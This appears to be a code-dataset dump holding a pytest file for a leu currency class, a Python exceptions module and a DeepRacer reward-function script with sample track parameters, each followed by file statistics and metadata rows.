'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert leu.__str__() == '-100,00 L'
def test_leu_custom(self):
"""test_leu_custom."""
amount = 1000
leu = Leu(
amount=amount,
decimal_places=5,
decimal_sign='.',
grouping_places=2,
grouping_sign=',',
international=True,
symbol_ahead=False,
symbol_separator='_')
decimal = CONTEXT.create_decimal(amount)
assert leu.amount == decimal
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 5
assert leu.decimal_sign == '.'
assert leu.grouping_places == 2
assert leu.grouping_sign == ','
assert leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '_'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: 1000, '
'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "_", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "5", '
'decimal_sign: ".", '
'grouping_places: "2", '
'grouping_sign: ",", '
'convertion: "", '
'international: True)')
assert leu.__str__() == 'RON 10,00.00000'
def test_leu_changed(self):
"""test_cleu_changed."""
leu = Leu(amount=1000)
with raises(
AttributeError,
match='can\'t set attribute'):
leu.amount = 999
with raises(
AttributeError,
match='can\'t set attribute'):
leu.alpha_code = 'EUR'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.convertion = '0123456789,.'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.symbol = '€'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.symbol_ahead = False
with raises(
AttributeError,
match='can\'t set attribute'):
leu.symbol_separator = '_'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.localized_symbol = '€'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.numeric_code = '978'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.decimal_places = 3
with raises(
AttributeError,
match='can\'t set attribute'):
leu.decimal_sign = ','
with raises(
AttributeError,
match='can\'t set attribute'):
leu.grouping_places = 4
with raises(
AttributeError,
match='can\'t set attribute'):
leu.grouping_sign = '.'
with raises(
AttributeError,
match='can\'t set attribute'):
leu.international = True
def test_leu_math_add(self):
"""test_leu_math_add."""
leu_one = Leu(amount=1)
leu_two = Leu(amount=2)
leu_three = Leu(amount=3)
currency = Currency(amount=1, alpha_code='OTHER')
with raises(
CurrencyMismatchException,
match='unsupported operation between currency RON and OTHER.'):
_ = leu_one + currency
with raises(
CurrencyTypeException,
match=(
'unsupported operation between <class \'multicurrency.'
'leu.Leu\'> '
'and <class \'str\'>.')):
_ = leu_one.__add__('1.00')
assert (
leu_one +
leu_two) == leu_three
def test_leu_slots(self):
"""test_leu_slots."""
leu = Leu(amount=1000)
with raises(
AttributeError,
match=(
'\'Leu\' '
'object has no attribute \'new_variable\'')):
leu.new_variable = 'fail' # pylint: disable=assigning-non-slot
| 36.072727
| 84
| 0.538432
| 1,503
| 15,872
| 5.405855
| 0.085163
| 0.120492
| 0.089969
| 0.099938
| 0.856615
| 0.814892
| 0.795815
| 0.789908
| 0.7776
| 0.755815
| 0
| 0.029596
| 0.346459
| 15,872
| 439
| 85
| 36.154897
| 0.753302
| 0.035849
| 0
| 0.754476
| 0
| 0
| 0.152174
| 0.004097
| 0
| 0
| 0
| 0
| 0.245524
| 1
| 0.030691
| false
| 0
| 0.015345
| 0
| 0.051151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4af2cee59291280c406b9f9ce445aaae5f3834af
| 797
|
py
|
Python
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | 2
|
2015-05-27T20:38:29.000Z
|
2017-02-16T11:48:05.000Z
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | 3
|
2015-01-15T23:32:45.000Z
|
2015-01-15T23:49:05.000Z
|
mercurius/exceptions.py
|
bossiernesto/mercurius
|
9c4bc26f45a317d4e22137b412f63f18976461fe
|
[
"BSD-2-Clause"
] | null | null | null |
class ConfigError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class MercuryUnsupportedService(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class MercuryConnectException(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class MercuriusRequestException(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class MercuriusHTTPException(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class MercuriusHeaderException(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
| 30.653846
| 49
| 0.690088
| 78
| 797
| 6.435897
| 0.166667
| 0.191235
| 0.286853
| 0.430279
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0.731076
| 0
| 0
| 0.166876
| 797
| 25
| 50
| 31.88
| 0.756024
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4af66b49747ff9477eb663df7989dbbcaf6a6e09
| 96,643
|
py
|
Python
|
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneReward.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | 1
|
2021-02-12T10:06:51.000Z
|
2021-02-12T10:06:51.000Z
|
# model name: tbone-015
#
import math
class HISTORY:
stepsPerSecond = 64
lookAheadSteps = 32
prev_speed=None
prev_steering_angle=None
prev_steps=None
prev_distance_centerline=None
prev_location=(0.00,0.00)
step_duration = float(1 / stepsPerSecond)
prev_total_reward = None
prev_heading = None
prev_closest_waypoints = None
class RaceStep:
def __init__(self, stepParams, params, stepNum):
if stepNum == 0:
self.location = HISTORY.prev_location
self.closest_waypoints = HISTORY.prev_closest_waypoints if HISTORY.prev_closest_waypoints != None else (0,1)
print("closest_waypoints: "+str(self.closest_waypoints))
self.distance_from_center = HISTORY.prev_distance_centerline if HISTORY.prev_distance_centerline != None else 0.00
print("distance_from_center: "+str(self.distance_from_center))
self.onTrack = True if (params["track_width"]*.5)>self.distance_from_center else False
self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0
self.stepNumber = stepParams["stepNumber"]
elif stepNum == 1:
self.location = stepParams["location"]
self.closest_waypoints = params["closest_waypoints"]
print("closest_waypoints: "+str(self.closest_waypoints))
self.distance_from_center = params["distance_from_center"]
print("distance_from_center: "+str(self.distance_from_center))
self.onTrack = True if (params["track_width"]*.5)>self.distance_from_center else False
self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0
self.stepNumber = stepParams["stepNumber"]
else:
self.location = stepParams["location"]
self.closest_waypoints = getClosestWaypoints(self.location, stepParams, params)
print("closest_waypoints: "+str(self.closest_waypoints))
self.distance_from_center = calcDistanceFromCenter(self.closest_waypoints,self.location,stepParams,params)
print("distance_from_center: "+str(self.distance_from_center))
self.onTrack = True if (params["track_width"]*.5)>self.distance_from_center else False
self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0
self.stepNumber = stepParams["stepNumber"]
def calcStepReward(self, stepParams, params):
rewardParams = params.copy()
rewardParams["distance_from_center"] = self.distance_from_center
rewardParams["closest_waypoints"]= self.closest_waypoints
centerline_reward = follow_centerline(rewardParams)
rewardParams["heading"] = stepParams["heading"]
#inside_reward = inside_borders(rewardParams)
#speed_reward = speed(rewardParams)
#direction_reward = direction_and_waypoint(rewardParams)
curProg = progress(rewardParams)
#print("CenterLine: "+str(centerline_reward)+" Direction Reward: "+str(direction_reward)+"Progress: "+str(curProg))
#print("CenterLine: "+str(centerline_reward)+" Direction Reward: "+str(direction_reward)+" Speed: "+str(speed_reward))
#print("CenterLine: "+str(centerline_reward))
# return float(centerline_reward+direction_reward+curProg)
return float(centerline_reward+curProg)
def calcDistanceFromCenter(closest_waypoints,location,stepParams, params):
waypoints = params["waypoints"]
segGH = (location[1]-waypoints[closest_waypoints[0]][1]) if closest_waypoints[0] != -1 else (location[1]-waypoints[0][1])
segOG = (location[0]-waypoints[closest_waypoints[0]][0]) if closest_waypoints[0] != -1 else (location[1]-waypoints[0][0])
stepHeading = params["heading"]
# print("Closest Waypoints: ")
# print(str(closest_waypoints))
wayPointY = waypoints[closest_waypoints[1]][1]-waypoints[closest_waypoints[0]][1]
wayPointX = waypoints[closest_waypoints[1]][0]-waypoints[closest_waypoints[0]][0]
wayPointZ = math.sqrt((wayPointX ** 2)+(wayPointY ** 2))
# Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians
track_direction = math.atan2(wayPointY, wayPointX)
# Convert to degree
track_direction = math.degrees(track_direction)
if track_direction > 90 and track_direction < 180:
track_direction = 180 - stepHeading
elif track_direction < -90 and track_direction > -180:
track_direction = track_direction + 180
if stepHeading > 90 and stepHeading < 180:
stepHeading = 180 - stepHeading
elif stepHeading < -90 and stepHeading > -180:
stepHeading = stepHeading + 180
if stepHeading != track_direction:
segOH = segGH/math.sin(stepHeading-track_direction) if stepHeading > track_direction else segGH/math.sin(track_direction - stepHeading)
segHZ = math.sin(stepHeading-track_direction) * segOH if stepHeading > track_direction else math.sin(track_direction-stepHeading) * segOH
else:
segOH = 0
segHZ = 0
print("calcDistance: track_direction: "+str(track_direction)+", stepHeading: "+str(stepHeading)+", segOH: "+str(segOH)+", segHZ: "+str(segHZ))
return segHZ
def getClosestWaypoints(location,stepParams, params):
waypoints=params["waypoints"]
startWaypoints = params["closest_waypoints"]
# print("startWaypoints: ")
# print(startWaypoints)
curClosestWaypointIndex = startWaypoints[0]
curClosestDistance = 100
posHeading = True if params["heading"] < 90 or params["heading"] > -90 else False
for num, waypoint in enumerate(params["waypoints"]):
# print("index: "+str(num)+" waypoint: "+str(waypoint)+" location: "+str(location))
xSQ = abs(waypoint[0]-location[0]) ** 2
ySQ = abs(waypoint[1]-location[1]) ** 2
z = math.sqrt((xSQ+ySQ))
# print("waypoint distance: "+str(z))
if z < curClosestDistance:
curClosestDistance = z
curClosestWaypointIndex = num
# print("curClosestWaypointIndex: "+str(curClosestWaypointIndex)+" location: "+str(location))
if posHeading:
if waypoints[curClosestWaypointIndex][0]>location[0]:
return (curClosestWaypointIndex-1,curClosestWaypointIndex) # if curClosestWaypointIndex > 0 else (0,curClosestWaypointIndex)
else:
return (curClosestWaypointIndex,curClosestWaypointIndex+1)
else:
if waypoints[curClosestWaypointIndex][0]>location[0]:
return (curClosestWaypointIndex,curClosestWaypointIndex-1) # if curClosestWaypointIndex > 0 else (curClosestWaypointIndex,0)
else:
return (curClosestWaypointIndex-1,curClosestWaypointIndex) # if curClosestWaypointIndex > 0 else (0,curClosestWaypointIndex)
def getDistanceCenterLine (track_width, distance_from_center):
# Read input parameters
delta = (track_width*.50)-distance_from_center
return delta
def isPOSHeading(currentHeading):
return True if currentHeading < 90 or currentHeading > -90 else False
def getFutureHeading(params):
futureHeading = params["heading"]
if isPOSHeading(params["heading"]):
futureHeading = params["heading"] + params["steering_angle"]
else:
futureHeading = params["heading"] - params["steering_angle"]
return futureHeading
def getCurLocation(stepDuration, params):
stepHypo = stepDuration * params["speed"]
futureHeading = getFutureHeading(params)
stepOpp = math.sin(futureHeading) * stepHypo
stepAdj = math.cos(futureHeading) * stepHypo
x = stepAdj + params["x"]
y = stepOpp + params["y"]
print("step location: "+ str(x) + ", " + str(y))
return [x,y]
def inside_borders(params):
'''
Example of rewarding the agent to stay inside the two borders of the track
'''
# Read input parameters
all_wheels_on_track = params['all_wheels_on_track']
distance_from_center = params['distance_from_center']
track_width = params['track_width']
# Give a very low reward by default
reward = 0
# Give a high reward if no wheels go off the track and
# the car is somewhere in between the track borders
if all_wheels_on_track:
reward = 0.50
bonus_reward = ((0.5*track_width)-distance_from_center)/(0.5*track_width)
if bonus_reward > 0.80:
bonus_reward = bonus_reward * 3.00
reward += bonus_reward
# Always return a float value
return reward
def speed(params):
#############################################################################
'''
speed
'''
# Read input variables
speed = params['speed']
track_width = params['track_width']
distance_from_center = params['distance_from_center']
# Set the speed threshold based your action space
SPEED_THRESHOLD = 4.00
if distance_from_center < (track_width * .10):
#return 1.00 * ((speed/SPEED_THRESHOLD) ** 3)
return 1.00 * (speed/SPEED_THRESHOLD)
else:
return 0
def progress(params):
prog = params["progress"]
print("Progress: "+str(prog))
return float(1.5 * ((prog/100)**3))
def follow_centerline(params):
'''
Example of rewarding the agent to follow center line
'''
# Read input parameters
track_width = params['track_width']
distance_from_center = params['distance_from_center']
delta = (track_width*.50)-distance_from_center
# print("Delta: "+str(delta)+", track width: "+str(track_width))
# Give higher reward if the car is closer to center line and vice versa
if distance_from_center == 0:
reward = 3.0
else:
#reward = 3.0 * ((delta/(track_width*.50)) ** 3)
reward = 3.0 * (delta/(track_width*.50))
return float(reward)
def direction_and_waypoint(params):
###############################################################################
'''
Example of using waypoints and heading to make the car in the right direction
'''
# Read input variables
waypoints = params['waypoints']
closest_waypoints = params['closest_waypoints']
heading = params['heading'] if params['heading'] != None else 0.00
# Initialize the reward with typical value
reward = 3.0
# Calculate the direction of the center line based on the closest waypoints
next_point = waypoints[closest_waypoints[1]]
prev_point = waypoints[closest_waypoints[0]]
# Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians
track_direction = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
# Convert to degree
track_direction = math.degrees(track_direction)
# Calculate the difference between the track direction and the heading direction of the car
direction_diff = abs(track_direction - heading)
if direction_diff > 180:
direction_diff = 360 - direction_diff
# Penalize the reward if the difference is too large
print("Heading: "+str(heading)+", Track Direction: "+str(track_direction))
#reward = float(reward * (((180-direction_diff)/180)**3))
reward = float(reward * ((180-direction_diff)/180))
return reward
def reward_function(params):
'''
Use the weighted reward matrix to generate a reward
'''
# Create Steps to Evaluate
print(params)
steps = []
stepLocations = []
stepRewards = []
curStep=2
rewardTotal=0
stepLocations.append(HISTORY.prev_location)
steps.append(RaceStep({
"location": HISTORY.prev_location,
"speed": HISTORY.prev_speed,
"distance_centerline": HISTORY.prev_distance_centerline,
"heading": HISTORY.prev_heading,
"stepNumber":0
}, params,0))
rewardTotal += steps[0].stepReward
stepRewards.append(steps[0].stepReward)
stepLocations.append((params["x"],params["y"]))
steps.append(RaceStep({
"location": (params["x"],params["y"]),
"speed": params["speed"],
"distance_centerline": params["distance_from_center"],
"heading": params["heading"],
"stepNumber":1
}, params,1))
rewardTotal += steps[1].stepReward
stepRewards.append(steps[1].stepReward)
stillOnTrack = True
while curStep < HISTORY.lookAheadSteps+1:
stepLocation = getCurLocation((HISTORY.step_duration * curStep),params)
stepLocations.append(stepLocation)
steps.append(RaceStep({
"location": stepLocation,
"speed": params["speed"],
"distance_centerline": None,
"heading": getFutureHeading(params),
"stepNumber":curStep
}, params,curStep))
if steps[curStep].onTrack and stillOnTrack:
rewardTotal += steps[curStep].stepReward
stepRewards.append(steps[curStep].stepReward)
else:
stillOnTrack = False
rewardTotal += 0
stepRewards.append(0)
print("LookAhead Step: "+ str(curStep) +" Award: "+str(rewardTotal))
curStep+=1
print("stepLocations: ")
print(str(stepLocations))
print("stepRewards: ")
print(str(stepRewards))
HISTORY.prev_location = (params["x"],params["y"])
HISTORY.prev_speed=params["speed"]
HISTORY.prev_steering_angle=params["steering_angle"]
HISTORY.prev_steps=params["steps"]
HISTORY.prev_distance_centerline=params["distance_from_center"]
HISTORY.prev_heading = params["heading"]
HISTORY.prev_total_reward = rewardTotal
return float(rewardTotal)
def main():
params = [
{'is_left_of_center': False, 'projection_distance': 0.1399085926407269, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.113037208643439, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9581620420269243, 'all_wheels_on_track': True, 'distance_from_center': 2.42061961851892e-05, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096329005125809, 'object_in_camera': False, 'heading': -0.20270984620429464, 'objects_speed': [], 'progress': 0.7156522898480779, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 1.0},
{'is_left_of_center': False, 'projection_distance': 0.14390030350019378, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1170200743079786, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9558374100872313, 'all_wheels_on_track': True, 'distance_from_center': 0.0023336167208049628, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096318089179309, 'object_in_camera': False, 'heading': -0.825491610728565, 'objects_speed': [], 'progress': 0.7360704569032253, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 2.0},
{'is_left_of_center': False, 'projection_distance': 0.15196206004735874, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 